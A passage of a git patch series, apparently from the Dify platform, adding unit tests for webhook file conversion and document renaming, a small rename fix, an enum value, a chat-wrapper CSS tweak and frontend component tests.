'invalid,csv,format\nwith,unbalanced,quotes,and"stuff' file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") mock_db_session.query.return_value.where.return_value.first.return_value = mock_app - with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + with ( + patch("services.annotation_service.current_account_with_tenant") as mock_auth, + patch("services.annotation_service.pd.read_csv", side_effect=ParserError("malformed CSV")), + ): mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") result = AppAnnotationService.batch_import_app_annotations("app_id", file) - # Should return error message about invalid format (less than 2 columns) assert "error_msg" in result - assert "at least 2 columns" in result["error_msg"].lower() + assert "malformed" in result["error_msg"].lower() def test_valid_import_succeeds(self, mock_app, mock_db_session): """Test that valid import request succeeds.""" diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py new file mode 100644 index 0000000000..ead2334473 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py @@ -0,0 +1,452 @@ +""" +Unit tests for webhook file conversion fix. + +This test verifies that webhook trigger nodes properly convert file dictionaries +to FileVariable objects, fixing the "Invalid variable type: ObjectVariable" error +when passing files to downstream LLM nodes. +""" + +from unittest.mock import Mock, patch + +from core.app.entities.app_invoke_entities import InvokeFrom +from core.workflow.entities.graph_init_params import GraphInitParams +from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus +from core.workflow.nodes.trigger_webhook.entities import ( + ContentType, + Method, + WebhookBodyParameter, + WebhookData, +) +from core.workflow.nodes.trigger_webhook.node import TriggerWebhookNode +from core.workflow.runtime.graph_runtime_state import GraphRuntimeState +from core.workflow.runtime.variable_pool import VariablePool +from core.workflow.system_variable import SystemVariable +from models.enums import UserFrom +from models.workflow import WorkflowType + + +def create_webhook_node( + webhook_data: WebhookData, + variable_pool: VariablePool, + tenant_id: str = "test-tenant", +) -> TriggerWebhookNode: + """Helper function to create a webhook node with proper initialization.""" + node_config = { + "id": "webhook-node-1", + "data": webhook_data.model_dump(), + } + + graph_init_params = GraphInitParams( + tenant_id=tenant_id, + app_id="test-app", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="test-workflow", + graph_config={}, + user_id="test-user", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) + + node = TriggerWebhookNode( + id="webhook-node-1", + config=node_config, + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, + ) + + # Attach a lightweight app_config onto runtime state for tenant lookups + runtime_state.app_config = Mock() + runtime_state.app_config.tenant_id = tenant_id + + # Provide compatibility alias expected by node implementation + # Some nodes reference `self.node_id`; expose it as an alias to `self.id` for tests + node.node_id = node.id + + return node + + +def create_test_file_dict( + filename: str = "test.jpg", + file_type: str = "image", + transfer_method: str = "local_file", +) -> dict: + """Create a test file dictionary as it would come from webhook service.""" + return { + "id": "file-123", + "tenant_id": "test-tenant", + "type": file_type, + "filename": filename, + "extension": ".jpg", + "mime_type": "image/jpeg", + "transfer_method": transfer_method, + "related_id": "related-123", + "storage_key": "storage-key-123", + "size": 1024, + "url": "https://example.com/test.jpg", + "created_at": 1234567890, + "used_at": None, + "hash": "file-hash-123", + } + + +def test_webhook_node_file_conversion_to_file_variable(): + """Test that webhook node converts file dictionaries to FileVariable objects.""" + # Create test file dictionary (as it comes from webhook service) + file_dict = create_test_file_dict("uploaded_image.jpg") + + data = WebhookData( + title="Test Webhook with File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image_upload", type="file", required=True), + WebhookBodyParameter(name="message", type="string", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {"message": "Test message"}, + "files": { + "image_upload": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Mock the file factory and variable factory + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks + mock_file_obj = Mock() + mock_file_obj.to_dict.return_value = file_dict + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var_instance = Mock() + mock_file_variable.return_value = mock_file_var_instance + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify file factory was called with correct parameters + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + # Verify segment factory was called to create FileSegment + mock_segment_factory.assert_called_once() + + # Verify FileVariable was created with correct parameters + mock_file_variable.assert_called_once() + call_args = mock_file_variable.call_args[1] + assert call_args["name"] == "image_upload" + # value should be whatever build_segment_with_type.value returned + assert call_args["value"] == mock_segment.value + assert call_args["selector"] == ["webhook-node-1", "image_upload"] + + # Verify output contains the FileVariable, not the original dict + assert result.outputs["image_upload"] == mock_file_var_instance + assert result.outputs["message"] == "Test message" + + +def test_webhook_node_file_conversion_with_missing_files(): + """Test webhook node file conversion with missing file parameter.""" + data = WebhookData( + title="Test Webhook with Missing File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="missing_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": {}, # No files + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify missing file parameter is None + assert result.outputs["_webhook_raw"]["files"] == {} + + +def test_webhook_node_file_conversion_with_none_file(): + """Test webhook node file conversion with None file value.""" + data = WebhookData( + title="Test Webhook with None File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="none_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": None, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify None file parameter is None + assert result.outputs["_webhook_raw"]["files"]["file"] is None + + +def test_webhook_node_file_conversion_with_non_dict_file(): + """Test webhook node file conversion with non-dict file value.""" + data = WebhookData( + title="Test Webhook with Non-Dict File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="wrong_type", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "not_a_dict", # Wrapped to match node expectation + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle non-dict case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify fallback to original (wrapped) mapping + assert result.outputs["_webhook_raw"]["files"]["file"] == "not_a_dict" + + +def test_webhook_node_file_conversion_mixed_parameters(): + """Test webhook node with mixed parameter types including files.""" + file_dict = create_test_file_dict("mixed_test.jpg") + + data = WebhookData( + title="Test Webhook Mixed Parameters", + method=Method.POST, + content_type=ContentType.FORM_DATA, + headers=[], + params=[], + body=[ + WebhookBodyParameter(name="text_param", type="string", required=True), + WebhookBodyParameter(name="number_param", type="number", required=False), + WebhookBodyParameter(name="file_param", type="file", required=True), + WebhookBodyParameter(name="bool_param", type="boolean", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": { + "text_param": "Hello World", + "number_param": 42, + "bool_param": True, + }, + "files": { + "file_param": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for file + mock_file_obj = Mock() + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var = Mock() + mock_file_variable.return_value = mock_file_var + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all parameters are present + assert result.outputs["text_param"] == "Hello World" + assert result.outputs["number_param"] == 42 + assert result.outputs["bool_param"] is True + assert result.outputs["file_param"] == mock_file_var + + # Verify file conversion was called + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + +def test_webhook_node_different_file_types(): + """Test webhook node file conversion with different file types.""" + image_dict = create_test_file_dict("image.jpg", "image") + + data = WebhookData( + title="Test Webhook Different File Types", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image", type="file", required=True), + WebhookBodyParameter(name="document", type="file", required=True), + WebhookBodyParameter(name="video", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "image": image_dict, + "document": create_test_file_dict("document.pdf", "document"), + "video": create_test_file_dict("video.mp4", "video"), + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for all files + mock_file_objs = [Mock() for _ in range(3)] + mock_segments = [Mock() for _ in range(3)] + mock_file_vars = [Mock() for _ in range(3)] + + # Map each segment.value to its corresponding mock file obj + for seg, f in zip(mock_segments, mock_file_objs): + seg.value = f + + mock_file_factory.side_effect = mock_file_objs + mock_segment_factory.side_effect = mock_segments + mock_file_variable.side_effect = mock_file_vars + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all file types were converted + assert mock_file_factory.call_count == 3 + assert result.outputs["image"] == mock_file_vars[0] + assert result.outputs["document"] == mock_file_vars[1] + assert result.outputs["video"] == mock_file_vars[2] + + +def test_webhook_node_file_conversion_with_non_dict_wrapper(): + """Test webhook node file conversion when the file wrapper is not a dict.""" + data = WebhookData( + title="Test Webhook with Non-dict File Wrapper", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="non_dict_wrapper", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "just a string", + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + result = node._run() + + # Verify successful execution (should not crash) + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + # Verify fallback to original value + assert result.outputs["_webhook_raw"]["files"]["file"] == "just a string" diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py index a599d4f831..bbb5511923 100644 --- a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py @@ -1,8 +1,10 @@ +from unittest.mock import patch + import pytest from core.app.entities.app_invoke_entities import InvokeFrom from core.file import File, FileTransferMethod, FileType -from core.variables import StringVariable +from core.variables import FileVariable, StringVariable from core.workflow.entities.graph_init_params import GraphInitParams from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.nodes.trigger_webhook.entities import ( @@ -27,26 +29,34 @@ def create_webhook_node(webhook_data: WebhookData, variable_pool: VariablePool) "data": webhook_data.model_dump(), } + graph_init_params = GraphInitParams( + tenant_id="1", + app_id="1", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="1", + graph_config={}, + user_id="1", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) node = TriggerWebhookNode( id="1", config=node_config, - graph_init_params=GraphInitParams( - tenant_id="1", - app_id="1", - workflow_type=WorkflowType.WORKFLOW, - workflow_id="1", - graph_config={}, - user_id="1", - user_from=UserFrom.ACCOUNT, - invoke_from=InvokeFrom.SERVICE_API, - call_depth=0, - ), - graph_runtime_state=GraphRuntimeState( - variable_pool=variable_pool, - start_at=0, - ), + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, ) + # Provide tenant_id for conversion path + runtime_state.app_config = type("_AppCfg", (), {"tenant_id": "1"})() + + # Compatibility alias for some nodes referencing `self.node_id` + node.node_id = node.id + return node @@ -246,20 +256,27 @@ def test_webhook_node_run_with_file_params(): "query_params": {}, "body": {}, "files": { - "upload": file1, - "document": file2, + "upload": file1.to_dict(), + "document": file2.to_dict(), }, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED - assert result.outputs["upload"] == file1 - assert result.outputs["document"] == file2 - assert result.outputs["missing_file"] is None + assert isinstance(result.outputs["upload"], FileVariable) + assert isinstance(result.outputs["document"], FileVariable) + assert result.outputs["upload"].value.filename == "image.jpg" def test_webhook_node_run_mixed_parameters(): @@ -291,19 +308,27 @@ def test_webhook_node_run_mixed_parameters(): "headers": {"Authorization": "Bearer token"}, "query_params": {"version": "v1"}, "body": {"message": "Test message"}, - "files": {"upload": file_obj}, + "files": {"upload": file_obj.to_dict()}, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED assert result.outputs["Authorization"] == "Bearer token" assert result.outputs["version"] == "v1" assert result.outputs["message"] == "Test message" - assert result.outputs["upload"] == file_obj + assert isinstance(result.outputs["upload"], FileVariable) + assert result.outputs["upload"].value.filename == "test.jpg" assert "_webhook_raw" in result.outputs diff --git a/api/tests/unit_tests/services/test_webhook_service.py b/api/tests/unit_tests/services/test_webhook_service.py index 6afe52d97b..920b1e91b6 100644 --- a/api/tests/unit_tests/services/test_webhook_service.py +++ b/api/tests/unit_tests/services/test_webhook_service.py @@ -82,19 +82,19 @@ class TestWebhookServiceUnit: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" with patch.object(WebhookService, "_process_file_uploads") as mock_process_files: - mock_process_files.return_value = {"upload": "mocked_file_obj"} + mock_process_files.return_value = {"file": "mocked_file_obj"} webhook_data = WebhookService.extract_webhook_data(webhook_trigger) assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert webhook_data["files"]["upload"] == "mocked_file_obj" + assert webhook_data["files"]["file"] == "mocked_file_obj" mock_process_files.assert_called_once() def test_extract_webhook_data_raw_text(self): From 187450b875b10c5b67ab85ee59f5629a1c1049e3 Mon Sep 17 00:00:00 2001 From: wangxiaolei Date: Mon, 15 Dec 2025 21:09:53 +0800 Subject: [PATCH 32/68] chore: skip upload_file_id is missing (#29666) --- api/services/dataset_service.py | 2 +- .../core/workflow/test_workflow_entry.py | 32 ++++ .../test_document_service_rename_document.py | 176 ++++++++++++++++++ 3 files changed, 209 insertions(+), 1 deletion(-) create mode 100644 api/tests/unit_tests/services/test_document_service_rename_document.py diff --git a/api/services/dataset_service.py b/api/services/dataset_service.py index 0df883ea98..970192fde5 100644 --- a/api/services/dataset_service.py +++ b/api/services/dataset_service.py @@ -1419,7 +1419,7 @@ class DocumentService: document.name = name db.session.add(document) - if document.data_source_info_dict: + if document.data_source_info_dict and "upload_file_id" in document.data_source_info_dict: db.session.query(UploadFile).where( UploadFile.id == document.data_source_info_dict["upload_file_id"] ).update({UploadFile.name: name}) diff --git a/api/tests/unit_tests/core/workflow/test_workflow_entry.py b/api/tests/unit_tests/core/workflow/test_workflow_entry.py index 75de5c455f..68d6c109e8 100644 --- a/api/tests/unit_tests/core/workflow/test_workflow_entry.py +++ b/api/tests/unit_tests/core/workflow/test_workflow_entry.py @@ -1,3 +1,5 @@ +from types import SimpleNamespace + import pytest from core.file.enums import FileType @@ -12,6 +14,36 @@ from core.workflow.system_variable import SystemVariable from core.workflow.workflow_entry import WorkflowEntry +@pytest.fixture(autouse=True) +def _mock_ssrf_head(monkeypatch): + """Avoid any real network requests during tests. + + file_factory._get_remote_file_info() uses ssrf_proxy.head to inspect + remote files. We stub it to return a minimal response object with + headers so filename/mime/size can be derived deterministically. + """ + + def fake_head(url, *args, **kwargs): + # choose a content-type by file suffix for determinism + if url.endswith(".pdf"): + ctype = "application/pdf" + elif url.endswith(".jpg") or url.endswith(".jpeg"): + ctype = "image/jpeg" + elif url.endswith(".png"): + ctype = "image/png" + else: + ctype = "application/octet-stream" + filename = url.split("/")[-1] or "file.bin" + headers = { + "Content-Type": ctype, + "Content-Disposition": f'attachment; filename="{filename}"', + "Content-Length": "12345", + } + return SimpleNamespace(status_code=200, headers=headers) + + monkeypatch.setattr("core.helper.ssrf_proxy.head", fake_head) + + class TestWorkflowEntry: """Test WorkflowEntry class methods.""" diff --git a/api/tests/unit_tests/services/test_document_service_rename_document.py b/api/tests/unit_tests/services/test_document_service_rename_document.py new file mode 100644 index 0000000000..94850ecb09 --- /dev/null +++ b/api/tests/unit_tests/services/test_document_service_rename_document.py @@ -0,0 +1,176 @@ +from types import SimpleNamespace +from unittest.mock import Mock, create_autospec, patch + +import pytest + +from models import Account +from services.dataset_service import DocumentService + + +@pytest.fixture +def mock_env(): + """Patch dependencies used by DocumentService.rename_document. + + Mocks: + - DatasetService.get_dataset + - DocumentService.get_document + - current_user (with current_tenant_id) + - db.session + """ + with ( + patch("services.dataset_service.DatasetService.get_dataset") as get_dataset, + patch("services.dataset_service.DocumentService.get_document") as get_document, + patch("services.dataset_service.current_user", create_autospec(Account, instance=True)) as current_user, + patch("extensions.ext_database.db.session") as db_session, + ): + current_user.current_tenant_id = "tenant-123" + yield { + "get_dataset": get_dataset, + "get_document": get_document, + "current_user": current_user, + "db_session": db_session, + } + + +def make_dataset(dataset_id="dataset-123", tenant_id="tenant-123", built_in_field_enabled=False): + return SimpleNamespace(id=dataset_id, tenant_id=tenant_id, built_in_field_enabled=built_in_field_enabled) + + +def make_document( + document_id="document-123", + dataset_id="dataset-123", + tenant_id="tenant-123", + name="Old Name", + data_source_info=None, + doc_metadata=None, +): + doc = Mock() + doc.id = document_id + doc.dataset_id = dataset_id + doc.tenant_id = tenant_id + doc.name = name + doc.data_source_info = data_source_info or {} + # property-like usage in code relies on a dict + doc.data_source_info_dict = dict(doc.data_source_info) + doc.doc_metadata = dict(doc_metadata or {}) + return doc + + +def test_rename_document_success(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "New Document Name" + + dataset = make_dataset(dataset_id) + document = make_document(document_id=document_id, dataset_id=dataset_id) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + result = DocumentService.rename_document(dataset_id, document_id, new_name) + + assert result is document + assert document.name == new_name + mock_env["db_session"].add.assert_called_once_with(document) + mock_env["db_session"].commit.assert_called_once() + + +def test_rename_document_with_built_in_fields(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + + dataset = make_dataset(dataset_id, built_in_field_enabled=True) + document = make_document(document_id=document_id, dataset_id=dataset_id, doc_metadata={"foo": "bar"}) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # BuiltInField.document_name == "document_name" in service code + assert document.doc_metadata["document_name"] == new_name + assert document.doc_metadata["foo"] == "bar" + + +def test_rename_document_updates_upload_file_when_present(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + file_id = "file-123" + + dataset = make_dataset(dataset_id) + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"upload_file_id": file_id}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + # Intercept UploadFile rename UPDATE chain + mock_query = Mock() + mock_query.where.return_value = mock_query + mock_env["db_session"].query.return_value = mock_query + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + mock_env["db_session"].query.assert_called() # update executed + + +def test_rename_document_does_not_update_upload_file_when_missing_id(mock_env): + """ + When data_source_info_dict exists but does not contain "upload_file_id", + UploadFile should not be updated. + """ + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Another Name" + + dataset = make_dataset(dataset_id) + # Ensure data_source_info_dict is truthy but lacks the key + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"url": "https://example.com"}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # Should NOT attempt to update UploadFile + mock_env["db_session"].query.assert_not_called() + + +def test_rename_document_dataset_not_found(mock_env): + mock_env["get_dataset"].return_value = None + + with pytest.raises(ValueError, match="Dataset not found"): + DocumentService.rename_document("missing", "doc", "x") + + +def test_rename_document_not_found(mock_env): + dataset = make_dataset("dataset-123") + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = None + + with pytest.raises(ValueError, match="Document not found"): + DocumentService.rename_document(dataset.id, "missing", "x") + + +def test_rename_document_permission_denied_when_tenant_mismatch(mock_env): + dataset = make_dataset("dataset-123") + # different tenant than current_user.current_tenant_id + document = make_document(dataset_id=dataset.id, tenant_id="tenant-other") + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + with pytest.raises(ValueError, match="No permission"): + DocumentService.rename_document(dataset.id, document.id, "x") From 4bf6c4dafaf49027df113eaeba15ef1d6a0cb90c Mon Sep 17 00:00:00 2001 From: quicksand Date: Mon, 15 Dec 2025 21:13:23 +0800 Subject: [PATCH 33/68] chore: add online drive metadata source enum (#29674) --- api/core/rag/index_processor/constant/built_in_field.py | 1 + 1 file changed, 1 insertion(+) diff --git a/api/core/rag/index_processor/constant/built_in_field.py b/api/core/rag/index_processor/constant/built_in_field.py index 9ad69e7fe3..7c270a32d0 100644 --- a/api/core/rag/index_processor/constant/built_in_field.py +++ b/api/core/rag/index_processor/constant/built_in_field.py @@ -15,3 +15,4 @@ class MetadataDataSource(StrEnum): notion_import = "notion" local_file = "file_upload" online_document = "online_document" + online_drive = "online_drive" From dd58d4a38de83a9543449b338fb5e5b986396589 Mon Sep 17 00:00:00 2001 From: hangboss1761 <1240123692@qq.com> Date: Mon, 15 Dec 2025 21:15:55 +0800 Subject: [PATCH 34/68] fix: update chat wrapper components to use min-h instead of h for better responsiveness (#29687) --- web/app/components/base/chat/chat-with-history/chat-wrapper.tsx | 2 +- web/app/components/base/chat/embedded-chatbot/chat-wrapper.tsx | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/web/app/components/base/chat/chat-with-history/chat-wrapper.tsx b/web/app/components/base/chat/chat-with-history/chat-wrapper.tsx index 94c80687ed..ab133d67af 100644 --- a/web/app/components/base/chat/chat-with-history/chat-wrapper.tsx +++ b/web/app/components/base/chat/chat-with-history/chat-wrapper.tsx @@ -218,7 +218,7 @@ const ChatWrapper = () => { ) } return ( -
+
{ ) } return ( -
+
Date: Mon, 15 Dec 2025 21:17:44 +0800 Subject: [PATCH 35/68] test: enhance DebugWithMultipleModel component test coverage (#29657) --- .../debug-with-multiple-model/index.spec.tsx | 249 ++++++++++++++++++ 1 file changed, 249 insertions(+) diff --git a/web/app/components/app/configuration/debug/debug-with-multiple-model/index.spec.tsx b/web/app/components/app/configuration/debug/debug-with-multiple-model/index.spec.tsx index 7607a21b07..86e756d95c 100644 --- a/web/app/components/app/configuration/debug/debug-with-multiple-model/index.spec.tsx +++ b/web/app/components/app/configuration/debug/debug-with-multiple-model/index.spec.tsx @@ -206,6 +206,218 @@ describe('DebugWithMultipleModel', () => { mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration()) }) + describe('edge cases and error handling', () => { + it('should handle empty multipleModelConfigs array', () => { + renderComponent({ multipleModelConfigs: [] }) + expect(screen.queryByTestId('debug-item')).not.toBeInTheDocument() + expect(screen.getByTestId('chat-input-area')).toBeInTheDocument() + }) + + it('should handle model config with missing required fields', () => { + const incompleteConfig = { id: 'incomplete' } as ModelAndParameter + renderComponent({ multipleModelConfigs: [incompleteConfig] }) + expect(screen.getByTestId('debug-item')).toBeInTheDocument() + }) + + it('should handle more than 4 model configs', () => { + const manyConfigs = Array.from({ length: 6 }, () => createModelAndParameter()) + renderComponent({ multipleModelConfigs: manyConfigs }) + + const items = screen.getAllByTestId('debug-item') + expect(items).toHaveLength(6) + + // Items beyond 4 should not have specialized positioning + items.slice(4).forEach((item) => { + expect(item.style.transform).toBe('translateX(0) translateY(0)') + }) + }) + + it('should handle modelConfig with undefined prompt_variables', () => { + // Note: The current component doesn't handle undefined/null prompt_variables gracefully + // This test documents the current behavior + const modelConfig = createModelConfig() + modelConfig.configs.prompt_variables = undefined as any + + mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration({ + modelConfig, + })) + + expect(() => renderComponent()).toThrow('Cannot read properties of undefined (reading \'filter\')') + }) + + it('should handle modelConfig with null prompt_variables', () => { + // Note: The current component doesn't handle undefined/null prompt_variables gracefully + // This test documents the current behavior + const modelConfig = createModelConfig() + modelConfig.configs.prompt_variables = null as any + + mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration({ + modelConfig, + })) + + expect(() => renderComponent()).toThrow('Cannot read properties of null (reading \'filter\')') + }) + + it('should handle prompt_variables with missing required fields', () => { + const incompleteVariables: PromptVariableWithMeta[] = [ + { key: '', name: 'Empty Key', type: 'string' }, // Empty key + { key: 'valid-key', name: undefined as any, type: 'number' }, // Undefined name + { key: 'no-type', name: 'No Type', type: undefined as any }, // Undefined type + ] + + const debugConfiguration = createDebugConfiguration({ + modelConfig: createModelConfig(incompleteVariables), + }) + mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration) + + renderComponent() + + // Should still render but handle gracefully + expect(screen.getByTestId('chat-input-area')).toBeInTheDocument() + expect(capturedChatInputProps?.inputsForm).toHaveLength(3) + }) + }) + + describe('props and callbacks', () => { + it('should call onMultipleModelConfigsChange when provided', () => { + const onMultipleModelConfigsChange = jest.fn() + renderComponent({ onMultipleModelConfigsChange }) + + // Context provider should pass through the callback + expect(onMultipleModelConfigsChange).not.toHaveBeenCalled() + }) + + it('should call onDebugWithMultipleModelChange when provided', () => { + const onDebugWithMultipleModelChange = jest.fn() + renderComponent({ onDebugWithMultipleModelChange }) + + // Context provider should pass through the callback + expect(onDebugWithMultipleModelChange).not.toHaveBeenCalled() + }) + + it('should not memoize when props change', () => { + const props1 = createProps({ multipleModelConfigs: [createModelAndParameter({ id: 'model-1' })] }) + const { rerender } = renderComponent(props1) + + const props2 = createProps({ multipleModelConfigs: [createModelAndParameter({ id: 'model-2' })] }) + rerender() + + const items = screen.getAllByTestId('debug-item') + expect(items[0]).toHaveAttribute('data-model-id', 'model-2') + }) + }) + + describe('accessibility', () => { + it('should have accessible chat input elements', () => { + renderComponent() + + const chatInput = screen.getByTestId('chat-input-area') + expect(chatInput).toBeInTheDocument() + + // Check for button accessibility + const sendButton = screen.getByRole('button', { name: /send/i }) + expect(sendButton).toBeInTheDocument() + + const featureButton = screen.getByRole('button', { name: /feature/i }) + expect(featureButton).toBeInTheDocument() + }) + + it('should apply ARIA attributes correctly', () => { + const multipleModelConfigs = [createModelAndParameter()] + renderComponent({ multipleModelConfigs }) + + // Debug items should be identifiable + const debugItem = screen.getByTestId('debug-item') + expect(debugItem).toBeInTheDocument() + expect(debugItem).toHaveAttribute('data-model-id') + }) + }) + + describe('prompt variables transformation', () => { + it('should filter out API type variables', () => { + const promptVariables: PromptVariableWithMeta[] = [ + { key: 'normal', name: 'Normal', type: 'string' }, + { key: 'api-var', name: 'API Var', type: 'api' }, + { key: 'number', name: 'Number', type: 'number' }, + ] + const debugConfiguration = createDebugConfiguration({ + modelConfig: createModelConfig(promptVariables), + }) + mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration) + + renderComponent() + + expect(capturedChatInputProps?.inputsForm).toHaveLength(2) + expect(capturedChatInputProps?.inputsForm).toEqual( + expect.arrayContaining([ + expect.objectContaining({ label: 'Normal', variable: 'normal' }), + expect.objectContaining({ label: 'Number', variable: 'number' }), + ]), + ) + expect(capturedChatInputProps?.inputsForm).not.toEqual( + 